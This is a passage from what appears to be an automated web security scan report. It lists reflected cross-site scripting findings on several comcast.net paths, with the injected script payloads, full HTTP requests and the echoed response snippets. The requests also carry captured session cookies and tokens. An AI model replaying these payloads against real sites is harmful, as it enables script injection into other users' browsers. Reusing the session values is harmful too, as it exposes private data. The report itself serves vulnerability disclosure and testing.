The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b was submitted in the REST URL parameter 2. This input was echoed as af101<img src=a onerror=alert(1)>df8f6893f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /finance/taxcenteraf101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='finance' subchannel'taxcenteraf101<img src=a onerror=alert(1)>df8f6893f8b'</h2>
...[SNIP]...

2.156. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/taxcenter/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload af54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701 was submitted in the REST URL parameter 2. This input was echoed as af54b--><img src=a onerror=alert(1)>653cf74b701 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /finance/taxcenteraf54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:53 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: taxcenteraf54b--><img src=a onerror=alert(1)>653cf74b701 -->
...[SNIP]...

2.157. http://www.comcast.net/local/19103/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /local/19103/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e was submitted in the REST URL parameter 2. This input was echoed as b6fbe"><img src=a onerror=alert(1)>af36ff5364e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /local/19103b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:47 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:47 GMT
Content-Length: 28243
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta h
...[SNIP]...
<input type="hidden" name="l" value="19103b6fbe"><img src=a onerror=alert(1)>af36ff5364e" />
...[SNIP]...

2.158. http://www.comcast.net/news/national/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f was submitted in the REST URL parameter 2. This input was echoed as 13854--><img src=a onerror=alert(1)>2c2f086376f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/national13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: national13854--><img src=a onerror=alert(1)>2c2f086376f -->
...[SNIP]...

2.159. http://www.comcast.net/news/national/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931 was submitted in the REST URL parameter 2. This input was echoed as 1613b<img src=a onerror=alert(1)>ca95b061931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/national1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:30 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'national1613b<img src=a onerror=alert(1)>ca95b061931'</h2>
...[SNIP]...

2.160. http://www.comcast.net/news/national/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc26"><script>alert(1)</script>895fb0d3fa6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national1bc26"><script>alert(1)</script>895fb0d3fa6/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/national1bc26"><script>alert(1)</script>895fb0d3fa6/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.161. http://www.comcast.net/news/odd/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cafd"><script>alert(1)</script>c6016ae582e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/odd6cafd"><script>alert(1)</script>c6016ae582e/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/odd6cafd"><script>alert(1)</script>c6016ae582e/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.162. http://www.comcast.net/news/odd/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184 was submitted in the REST URL parameter 2. This input was echoed as 88c7e--><img src=a onerror=alert(1)>edebff5d184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/odd88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:34 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: odd88c7e--><img src=a onerror=alert(1)>edebff5d184 -->
...[SNIP]...

2.163. http://www.comcast.net/news/odd/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383 was submitted in the REST URL parameter 2. This input was echoed as 48f02<img src=a onerror=alert(1)>39ff31c1383 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/odd48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'odd48f02<img src=a onerror=alert(1)>39ff31c1383'</h2>
...[SNIP]...

2.164. http://www.comcast.net/news/politics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b71"><script>alert(1)</script>f076230e9b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/politicsc7b71"><script>alert(1)</script>f076230e9b9/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:12 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/politicsc7b71"><script>alert(1)</script>f076230e9b9/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.165. http://www.comcast.net/news/politics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372 was submitted in the REST URL parameter 2. This input was echoed as 7033f<img src=a onerror=alert(1)>274078d2372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/politics7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:23 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:23 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'politics7033f<img src=a onerror=alert(1)>274078d2372'</h2>
...[SNIP]...

2.166. http://www.comcast.net/news/politics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248 was submitted in the REST URL parameter 2. This input was echoed as c34ca--><img src=a onerror=alert(1)>6cceb973248 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/politicsc34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:28 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: politicsc34ca--><img src=a onerror=alert(1)>6cceb973248 -->
...[SNIP]...

2.167. http://www.comcast.net/news/world/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8771d"><script>alert(1)</script>ed2178a344a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/world8771d"><script>alert(1)</script>ed2178a344a/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
